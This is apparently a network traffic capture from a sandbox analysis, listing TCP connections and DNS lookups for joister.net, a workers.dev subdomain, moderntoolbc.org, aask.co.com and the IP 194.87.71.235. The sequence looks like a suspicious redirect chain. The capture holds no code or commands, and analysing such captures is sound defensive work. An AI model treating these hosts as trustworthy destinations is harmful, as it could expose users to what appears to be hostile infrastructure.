                                        Jan 9, 2025 00:45:57.557415009 CET44349743104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:57.557495117 CET44349743104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:57.557581902 CET49743443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:57.558353901 CET49743443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:45:57.558374882 CET44349743104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:45:58.696480989 CET49673443192.168.2.16204.79.197.203
                                        Jan 9, 2025 00:45:59.114985943 CET44349721142.250.185.196192.168.2.16
                                        Jan 9, 2025 00:45:59.115060091 CET44349721142.250.185.196192.168.2.16
                                        Jan 9, 2025 00:45:59.115120888 CET49721443192.168.2.16142.250.185.196
                                        Jan 9, 2025 00:45:59.959188938 CET49721443192.168.2.16142.250.185.196
                                        Jan 9, 2025 00:45:59.959225893 CET44349721142.250.185.196192.168.2.16
                                        Jan 9, 2025 00:46:00.630804062 CET49744443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:00.630848885 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:00.630948067 CET49744443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:00.631195068 CET49744443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:00.631207943 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.104903936 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.105259895 CET49744443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.105274916 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.105612040 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.105937958 CET49744443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.106009960 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.106091022 CET49744443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.106129885 CET49744443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.106167078 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.106251001 CET49744443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.106261969 CET49744443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.106275082 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.370930910 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.371037006 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.371068001 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.371102095 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.371118069 CET49744443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.371129036 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.371160030 CET49744443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.371161938 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.371206045 CET49744443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.372334003 CET49744443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.372354031 CET44349744104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.375216007 CET49745443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.375255108 CET44349745104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.375339031 CET49745443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.375567913 CET49745443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.375581980 CET44349745104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.396302938 CET49746443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:01.396362066 CET44349746194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:01.396481991 CET49746443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:01.396644115 CET49746443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:01.396657944 CET44349746194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:01.695404053 CET4968080192.168.2.16192.229.211.108
                                        Jan 9, 2025 00:46:01.855941057 CET44349745104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.856252909 CET49745443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.856270075 CET44349745104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.856630087 CET44349745104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.856992006 CET49745443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.857064962 CET44349745104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.857141972 CET49745443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.899341106 CET44349745104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.995321989 CET44349745104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.995402098 CET44349745104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:01.995471954 CET49745443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.996026039 CET49745443192.168.2.16104.18.94.41
                                        Jan 9, 2025 00:46:01.996047974 CET44349745104.18.94.41192.168.2.16
                                        Jan 9, 2025 00:46:02.060599089 CET44349746194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:02.060873032 CET49746443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:02.060902119 CET44349746194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:02.062011957 CET44349746194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:02.062082052 CET49746443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:02.063124895 CET49746443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:02.063200951 CET44349746194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:02.063325882 CET49746443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:02.063335896 CET44349746194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:02.111463070 CET49746443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:02.330734015 CET44349746194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:02.330837965 CET44349746194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:02.330908060 CET49746443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:02.331242085 CET49746443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:02.331260920 CET44349746194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:02.332314014 CET49747443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:02.332362890 CET44349747194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:02.332448006 CET49747443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:02.332658052 CET49747443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:02.332684040 CET44349747194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:02.974189997 CET44349747194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:02.974560976 CET49747443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:02.974595070 CET44349747194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:02.974948883 CET44349747194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:02.975255013 CET49747443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:02.975332022 CET44349747194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:02.975444078 CET49747443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:03.019335032 CET44349747194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:03.481786013 CET44349747194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:03.484674931 CET44349747194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:03.484765053 CET49747443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:03.484973907 CET49747443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:03.484994888 CET44349747194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:03.517024040 CET49748443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:03.517070055 CET44349748194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:03.517151117 CET49748443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:03.517417908 CET49749443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:03.517461061 CET44349749194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:03.517518044 CET49749443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:03.517626047 CET49750443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:03.517633915 CET44349750194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:03.517689943 CET49750443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:03.517905951 CET49748443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:03.517911911 CET44349748194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:03.518039942 CET49749443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:03.518047094 CET44349749194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:03.518172026 CET49750443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:03.518176079 CET44349750194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.156245947 CET44349748194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.156554937 CET49748443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.156577110 CET44349748194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.157387972 CET44349749194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.157588005 CET49749443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.157603025 CET44349749194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.157793045 CET44349748194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.157902002 CET49748443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.158675909 CET44349749194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.158765078 CET49749443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.159041882 CET49749443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.159048080 CET49748443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.159122944 CET44349749194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.159162998 CET44349748194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.159174919 CET49748443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.164621115 CET44349750194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.164843082 CET49750443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.164872885 CET44349750194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.165951967 CET44349750194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.166037083 CET49750443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.166333914 CET49750443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.166399002 CET44349750194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.166419029 CET49750443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.203336954 CET44349748194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.211333036 CET44349750194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.214456081 CET49749443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.214457989 CET49748443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.214457989 CET49750443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.214482069 CET44349748194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.214488029 CET44349749194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.214493990 CET44349750194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.262437105 CET49750443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.262454033 CET49748443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.262454987 CET49749443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.423857927 CET44349748194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.423960924 CET44349748194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.424048901 CET49748443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.424453974 CET49748443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.424474001 CET44349748194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.426280022 CET49749443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.471340895 CET44349749194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.631479025 CET44349750194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.632035017 CET49750443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.632064104 CET44349750194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.632184982 CET49750443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.633656025 CET49751443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.633691072 CET44349751194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.633758068 CET49751443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.634027004 CET49751443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.634042978 CET44349751194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.665220976 CET44349749194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.665720940 CET49749443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.665786982 CET44349749194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.665838957 CET49749443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.668248892 CET49752443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.668282032 CET44349752194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:04.668349981 CET49752443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.668612003 CET49752443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:04.668629885 CET44349752194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.289482117 CET44349751194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.289849043 CET49751443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:05.289874077 CET44349751194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.290951014 CET44349751194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.291054964 CET49751443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:05.291341066 CET49751443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:05.291393995 CET44349751194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.291505098 CET49751443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:05.291512966 CET44349751194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.312457085 CET44349752194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.312753916 CET49752443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:05.312776089 CET44349752194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.313127995 CET44349752194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.313441038 CET49752443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:05.313503981 CET44349752194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.313574076 CET49752443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:05.343470097 CET49751443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:05.359328032 CET44349752194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.567056894 CET44349751194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.567091942 CET44349751194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.567174911 CET44349751194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.567202091 CET49751443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:05.567250013 CET49751443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:05.568352938 CET49751443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:05.568371058 CET44349751194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.638050079 CET44349752194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.638823032 CET49752443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:05.638878107 CET44349752194.87.71.235192.168.2.16
                                        Jan 9, 2025 00:46:05.638933897 CET49752443192.168.2.16194.87.71.235
                                        Jan 9, 2025 00:46:06.827553988 CET49678443192.168.2.1620.189.173.10
                                        Jan 9, 2025 00:46:11.298532009 CET4968080192.168.2.16192.229.211.108
                                        Jan 9, 2025 00:46:29.864197969 CET8049698217.20.57.40192.168.2.16
                                        Jan 9, 2025 00:46:29.864309072 CET4969880192.168.2.16217.20.57.40
                                        Jan 9, 2025 00:46:29.864449024 CET4969880192.168.2.16217.20.57.40
                                        Jan 9, 2025 00:46:29.869272947 CET8049698217.20.57.40192.168.2.16
                                        Jan 9, 2025 00:46:30.598097086 CET8049699217.20.57.40192.168.2.16
                                        Jan 9, 2025 00:46:30.598223925 CET4969980192.168.2.16217.20.57.40
                                        Jan 9, 2025 00:46:30.598275900 CET4969980192.168.2.16217.20.57.40
                                        Jan 9, 2025 00:46:30.603146076 CET8049699217.20.57.40192.168.2.16
                                        Jan 9, 2025 00:46:30.928584099 CET4971580192.168.2.16120.138.96.3
                                        Jan 9, 2025 00:46:30.933402061 CET8049715120.138.96.3192.168.2.16
                                        Jan 9, 2025 00:46:45.956337929 CET4971580192.168.2.16120.138.96.3
                                        Jan 9, 2025 00:46:45.961436033 CET8049715120.138.96.3192.168.2.16
                                        Jan 9, 2025 00:46:45.961543083 CET4971580192.168.2.16120.138.96.3
                                        Jan 9, 2025 00:46:48.558686018 CET49755443192.168.2.16142.250.185.196
                                        Jan 9, 2025 00:46:48.558732033 CET44349755142.250.185.196192.168.2.16
                                        Jan 9, 2025 00:46:48.558808088 CET49755443192.168.2.16142.250.185.196
                                        Jan 9, 2025 00:46:48.559014082 CET49755443192.168.2.16142.250.185.196
                                        Jan 9, 2025 00:46:48.559026957 CET44349755142.250.185.196192.168.2.16
                                        Jan 9, 2025 00:46:49.263947964 CET44349755142.250.185.196192.168.2.16
                                        Jan 9, 2025 00:46:49.264348030 CET49755443192.168.2.16142.250.185.196
                                        Jan 9, 2025 00:46:49.264364958 CET44349755142.250.185.196192.168.2.16
                                        Jan 9, 2025 00:46:49.264729977 CET44349755142.250.185.196192.168.2.16
                                        Jan 9, 2025 00:46:49.265182018 CET49755443192.168.2.16142.250.185.196
                                        Jan 9, 2025 00:46:49.265255928 CET44349755142.250.185.196192.168.2.16
                                        Jan 9, 2025 00:46:49.309771061 CET49755443192.168.2.16142.250.185.196
                                        Jan 9, 2025 00:46:59.181859970 CET44349755142.250.185.196192.168.2.16
                                        Jan 9, 2025 00:46:59.181941032 CET44349755142.250.185.196192.168.2.16
                                        Jan 9, 2025 00:46:59.182056904 CET49755443192.168.2.16142.250.185.196
                                        Jan 9, 2025 00:46:59.962223053 CET49755443192.168.2.16142.250.185.196
                                        Jan 9, 2025 00:46:59.962254047 CET44349755142.250.185.196192.168.2.16
                                        Jan 9, 2025 00:47:20.676681995 CET49700443192.168.2.1640.126.31.73
                                        Jan 9, 2025 00:47:20.676682949 CET4970180192.168.2.16192.229.221.95
                                        Jan 9, 2025 00:47:20.681781054 CET4434970040.126.31.73192.168.2.16
                                        Jan 9, 2025 00:47:20.681876898 CET49700443192.168.2.1640.126.31.73
                                        Jan 9, 2025 00:47:20.682050943 CET8049701192.229.221.95192.168.2.16
                                        Jan 9, 2025 00:47:20.682104111 CET4970180192.168.2.16192.229.221.95
                                        Jan 9, 2025 00:47:22.928653002 CET49702443192.168.2.1640.126.31.73
                                        Jan 9, 2025 00:47:22.944833994 CET4434970240.126.31.73192.168.2.16
                                        Jan 9, 2025 00:47:22.944914103 CET49702443192.168.2.1640.126.31.73
                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 9, 2025 00:45:43.695207119 CET53507871.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:43.719310999 CET53645491.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:44.509597063 CET5540853192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:44.510519981 CET5010853192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:44.516587973 CET53554081.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:44.530215979 CET53501081.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:44.720906973 CET53577521.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:45.661371946 CET5049753192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:45.661591053 CET6202353192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:45.906424046 CET53504971.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:45.914496899 CET53620231.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:46.862987995 CET4968653192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:46.863147974 CET4980453192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:46.869966030 CET53496861.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:47.112044096 CET53498041.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:48.469317913 CET5609753192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:48.469533920 CET5239053192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:48.476470947 CET53560971.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:48.477554083 CET53523901.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:48.497468948 CET6483053192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:48.497814894 CET6260153192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:48.504175901 CET53648301.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:48.504489899 CET53626011.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:49.661896944 CET5970153192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:49.662147999 CET5167753192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:49.669317007 CET53516771.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:49.669332027 CET53597011.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:50.954436064 CET6548253192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:50.954771996 CET5175953192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:50.961201906 CET53654821.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:50.961909056 CET53517591.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:50.964375973 CET5861553192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:50.964726925 CET6327653192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:50.971043110 CET53586151.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:50.971539974 CET53632761.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:52.736177921 CET5328153192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:52.736469030 CET5348053192.168.2.161.1.1.1
                                        Jan 9, 2025 00:45:52.746151924 CET53532811.1.1.1192.168.2.16
                                        Jan 9, 2025 00:45:52.747004986 CET53534801.1.1.1192.168.2.16
                                        Jan 9, 2025 00:46:01.378077030 CET5011553192.168.2.161.1.1.1
                                        Jan 9, 2025 00:46:01.378209114 CET5401353192.168.2.161.1.1.1
                                        Jan 9, 2025 00:46:01.389302015 CET53501151.1.1.1192.168.2.16
                                        Jan 9, 2025 00:46:01.395863056 CET53540131.1.1.1192.168.2.16
                                        Jan 9, 2025 00:46:01.785396099 CET53590711.1.1.1192.168.2.16
                                        Jan 9, 2025 00:46:03.491946936 CET5965353192.168.2.161.1.1.1
                                        Jan 9, 2025 00:46:03.492104053 CET5219553192.168.2.161.1.1.1
                                        Jan 9, 2025 00:46:03.493376970 CET5491753192.168.2.161.1.1.1
                                        Jan 9, 2025 00:46:03.493544102 CET6306253192.168.2.161.1.1.1
                                        Jan 9, 2025 00:46:03.501677990 CET53630621.1.1.1192.168.2.16
                                        Jan 9, 2025 00:46:03.502701044 CET53596531.1.1.1192.168.2.16
                                        Jan 9, 2025 00:46:03.516310930 CET53521951.1.1.1192.168.2.16
                                        Jan 9, 2025 00:46:03.516324043 CET53549171.1.1.1192.168.2.16
                                        Jan 9, 2025 00:46:20.841959953 CET53598311.1.1.1192.168.2.16
                                        Jan 9, 2025 00:46:43.452519894 CET53637861.1.1.1192.168.2.16
                                        Jan 9, 2025 00:46:43.644921064 CET53642351.1.1.1192.168.2.16
                                        Jan 9, 2025 00:46:44.074027061 CET138138192.168.2.16192.168.2.255
                                        Jan 9, 2025 00:47:14.215053082 CET53528801.1.1.1192.168.2.16
                                        TimestampSource IPDest IPChecksumCodeType
                                        Jan 9, 2025 00:45:44.530790091 CET192.168.2.161.1.1.1c22b(Port unreachable)Destination Unreachable
                                        Jan 9, 2025 00:45:47.112133026 CET192.168.2.161.1.1.1c225(Port unreachable)Destination Unreachable
                                        Jan 9, 2025 00:46:03.516549110 CET192.168.2.161.1.1.1c233(Port unreachable)Destination Unreachable
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jan 9, 2025 00:45:44.509597063 CET192.168.2.161.1.1.10x9b3fStandard query (0)www.google.atA (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:44.510519981 CET192.168.2.161.1.1.10x9d76Standard query (0)www.google.at65IN (0x0001)false
                                        Jan 9, 2025 00:45:45.661371946 CET192.168.2.161.1.1.10x903fStandard query (0)joister.netA (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:45.661591053 CET192.168.2.161.1.1.10x5efeStandard query (0)joister.net65IN (0x0001)false
                                        Jan 9, 2025 00:45:46.862987995 CET192.168.2.161.1.1.10xd5ffStandard query (0)joister.netA (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:46.863147974 CET192.168.2.161.1.1.10x6a7Standard query (0)joister.net65IN (0x0001)false
                                        Jan 9, 2025 00:45:48.469317913 CET192.168.2.161.1.1.10xa877Standard query (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.devA (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:48.469533920 CET192.168.2.161.1.1.10x6670Standard query (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev65IN (0x0001)false
                                        Jan 9, 2025 00:45:48.497468948 CET192.168.2.161.1.1.10x9954Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:48.497814894 CET192.168.2.161.1.1.10x61dfStandard query (0)www.google.com65IN (0x0001)false
                                        Jan 9, 2025 00:45:49.661896944 CET192.168.2.161.1.1.10x3a98Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:49.662147999 CET192.168.2.161.1.1.10xad32Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 9, 2025 00:45:50.954436064 CET192.168.2.161.1.1.10x1addStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:50.954771996 CET192.168.2.161.1.1.10x91a9Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 9, 2025 00:45:50.964375973 CET192.168.2.161.1.1.10x7385Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:50.964726925 CET192.168.2.161.1.1.10x89ffStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                        Jan 9, 2025 00:45:52.736177921 CET192.168.2.161.1.1.10xfc4eStandard query (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.devA (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:52.736469030 CET192.168.2.161.1.1.10x96f5Standard query (0)2c079db7.df34542e8ba91dbfaec98ed5.workers.dev65IN (0x0001)false
                                        Jan 9, 2025 00:46:01.378077030 CET192.168.2.161.1.1.10x1a5aStandard query (0)moderntoolbc.orgA (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:46:01.378209114 CET192.168.2.161.1.1.10xd3e3Standard query (0)moderntoolbc.org65IN (0x0001)false
                                        Jan 9, 2025 00:46:03.491946936 CET192.168.2.161.1.1.10x1d7bStandard query (0)aask.co.comA (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:46:03.492104053 CET192.168.2.161.1.1.10x2444Standard query (0)aask.co.com65IN (0x0001)false
                                        Jan 9, 2025 00:46:03.493376970 CET192.168.2.161.1.1.10x6eaStandard query (0)moderntoolbc.orgA (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:46:03.493544102 CET192.168.2.161.1.1.10x9d7eStandard query (0)moderntoolbc.org65IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jan 9, 2025 00:45:44.516587973 CET1.1.1.1192.168.2.160x9b3fNo error (0)www.google.at142.250.184.195A (IP address)IN (0x0001)false
                                        Jan 9, 2025 00:45:45.906424046 CET1.1.1.1192.168.2.160x903fNo error (0)joister.net120.138.96.3A (IP address)IN (0x0001)false
